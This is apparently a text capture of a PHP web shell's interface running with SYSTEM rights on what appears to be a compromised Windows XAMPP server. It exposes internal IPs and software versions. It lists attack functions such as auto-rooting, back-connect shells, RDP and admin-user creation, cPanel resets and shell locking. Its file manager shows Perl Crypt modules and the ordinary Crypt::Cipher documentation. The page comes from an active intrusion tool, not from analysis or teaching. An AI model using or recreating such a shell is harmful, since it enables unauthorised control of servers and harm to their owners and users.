Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
Crypt /
[ HOME SHELL ]
Name
Size
Permission
Action
AuthEnc
[ DIR ]
drwxrwxrwx
CAST5_PP
[ DIR ]
drwxrwxrwx
Checksum
[ DIR ]
drwxrwxrwx
Cipher
[ DIR ]
drwxrwxrwx
DSA
[ DIR ]
drwxrwxrwx
Digest
[ DIR ]
drwxrwxrwx
Mac
[ DIR ]
drwxrwxrwx
Mode
[ DIR ]
drwxrwxrwx
OpenPGP
[ DIR ]
drwxrwxrwx
OpenSSL
[ DIR ]
drwxrwxrwx
PK
[ DIR ]
drwxrwxrwx
PRNG
[ DIR ]
drwxrwxrwx
RIPEMD160
[ DIR ]
drwxrwxrwx
RSA
[ DIR ]
drwxrwxrwx
Random
[ DIR ]
drwxrwxrwx
SSLeay
[ DIR ]
drwxrwxrwx
Stream
[ DIR ]
drwxrwxrwx
AuthEnc.pm
152
B
-rw-rw-rw-
Blowfish.pm
4.66
KB
-rw-rw-rw-
CAST5_PP.pm
8.57
KB
-rw-rw-rw-
CBC.pm
36.75
KB
-rw-rw-rw-
Checksum.pm
2.2
KB
-rw-rw-rw-
Cipher.pm
4.09
KB
-rw-rw-rw-
DES.pm
3.43
KB
-rw-rw-rw-
DES_EDE3.pm
2.68
KB
-rw-rw-rw-
DSA.pm
6.82
KB
-rw-rw-rw-
Digest.pm
9.12
KB
-rw-rw-rw-
IDEA.pm
1.31
KB
-rw-rw-rw-
IDEA.pod
1.83
KB
-rw-rw-rw-
KeyDerivation.pm
3.65
KB
-rw-rw-rw-
Mac.pm
711
B
-rw-rw-rw-
Misc.pm
14.59
KB
-rw-rw-rw-
Mode.pm
146
B
-rw-rw-rw-
OpenPGP.pm
58.89
KB
-rw-rw-rw-
PK.pm
505
B
-rw-rw-rw-
PRNG.pm
6.49
KB
-rw-rw-rw-
RC4.pm
4.78
KB
-rw-rw-rw-
RC6.pm
1.37
KB
-rw-rw-rw-
RIPEMD160.pm
7.38
KB
-rw-rw-rw-
RSA.pm
17.05
KB
-rw-rw-rw-
Rijndael.pm
3.06
KB
-rw-rw-rw-
SSLeay.pm
17.11
KB
-rw-rw-rw-
Serpent.pm
2.15
KB
-rw-rw-rw-
Twofish.pm
3.34
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Cipher.pm
package Crypt::Cipher; use strict; use warnings; our $VERSION = '0.068'; use Carp; $Carp::Internal{(__PACKAGE__)}++; use CryptX; ### the following methods/functions are implemented in XS: # - new # - DESTROY # - blocksize # - decrypt # - default_rounds # - encrypt # - max_keysize # - min_keysize sub keysize { goto \&max_keysize; } # for Crypt::CBC compatibility sub CLONE_SKIP { 1 } # prevent cloning 1; =pod =head1 NAME Crypt::Cipher - Generic interface to cipher functions =head1 SYNOPSIS #### example 1 (encrypting single block) use Crypt::Cipher; my $key = '...'; # length has to be valid key size for this cipher my $c = Crypt::Cipher->new('AES', $key); my $blocksize = $c->blocksize; my $ciphertext = $c->encrypt('plain text block'); #encrypt 1 block my $plaintext = $c->decrypt($ciphertext); #decrypt 1 block ### example 2 (using CBC mode) use Crypt::Mode::CBC; my $key = '...'; # length has to be valid key size for this cipher my $iv = '...'; # 16 bytes my $cbc = Crypt::Mode::CBC->new('AES'); my $ciphertext = $cbc->encrypt("secret data", $key, $iv); #### example 3 (compatibility with Crypt::CBC) use Crypt::CBC; use Crypt::Cipher; my $key = '...'; # length has to be valid key size for this cipher my $iv = '...'; # 16 bytes my $cipher = Crypt::Cipher('AES', $key); my $cbc = Crypt::CBC->new( -cipher=>$cipher, -iv=>$iv ); my $ciphertext = $cbc->encrypt("secret data"); =head1 DESCRIPTION Provides an interface to various symmetric cipher algorithms. B<BEWARE:> This module implements just elementary "one-block-(en|de)cryption" operation - if you want to encrypt/decrypt generic data you have to use some of the cipher block modes - check for example L<Crypt::Mode::CBC|Crypt::Mode::CBC>, L<Crypt::Mode::CTR|Crypt::Mode::CTR> or L<Crypt::CBC|Crypt::CBC> (which will be slower). =head1 METHODS =head2 new Constructor, returns a reference to the cipher object. ## basic scenario $d = Crypt::Cipher->new($name, $key); # $name = one of 'AES', 'Anubis', 'Blowfish', 'CAST5', 'Camellia', 'DES', 'DES_EDE', # 'KASUMI', 'Khazad', 'MULTI2', 'Noekeon', 'RC2', 'RC5', 'RC6', # 'SAFERP', 'SAFER_K128', 'SAFER_K64', 'SAFER_SK128', 'SAFER_SK64', # 'SEED', 'Skipjack', 'Twofish', 'XTEA', 'IDEA', 'Serpent' # simply any <NAME> for which there exists Crypt::Cipher::<NAME> # $key = binary key (keysize should comply with selected cipher requirements) ## some of the ciphers (e.g. MULTI2, RC5, SAFER) allow one to set number of rounds $d = Crypt::Cipher->new('MULTI2', $key, $rounds); # $rounds = positive integer (should comply with selected cipher requirements) =head2 encrypt Encrypts $plaintext and returns the $ciphertext where $plaintext and $ciphertext should be of B<blocksize> bytes. $ciphertext = $d->encrypt($plaintext); =head2 decrypt Decrypts $ciphertext and returns the $plaintext where $plaintext and $ciphertext should be of B<blocksize> bytes. $plaintext = $d->encrypt($ciphertext); =head2 keysize Just an alias for B<max_keysize> (needed for L<Crypt::CBC|Crypt::CBC> compatibility). =head2 max_keysize Returns the maximal allowed key size (in bytes) for given cipher. $d->max_keysize; #or Crypt::Cipher->max_keysize('AES'); #or Crypt::Cipher::max_keysize('AES'); =head2 min_keysize Returns the minimal allowed key size (in bytes) for given cipher. $d->min_keysize; #or Crypt::Cipher->min_keysize('AES'); #or Crypt::Cipher::min_keysize('AES'); =head2 blocksize Returns block size (in bytes) for given cipher. $d->blocksize; #or Crypt::Cipher->blocksize('AES'); #or Crypt::Cipher::blocksize('AES'); =head2 default_rounds Returns default number of rounds for given cipher. NOTE: only some ciphers (e.g. MULTI2, RC5, SAFER) allow one to set number of rounds via new(). $d->default_rounds; #or Crypt::Cipher->default_rounds('AES'); #or Crypt::Cipher::default_rounds('AES'); =head1 SEE ALSO =over =item * L<CryptX|CryptX> =item * Check subclasses like L<Crypt::Cipher::AES|Crypt::Cipher::AES>, L<Crypt::Cipher::Blowfish|Crypt::Cipher::Blowfish>, ... =back =cut
Close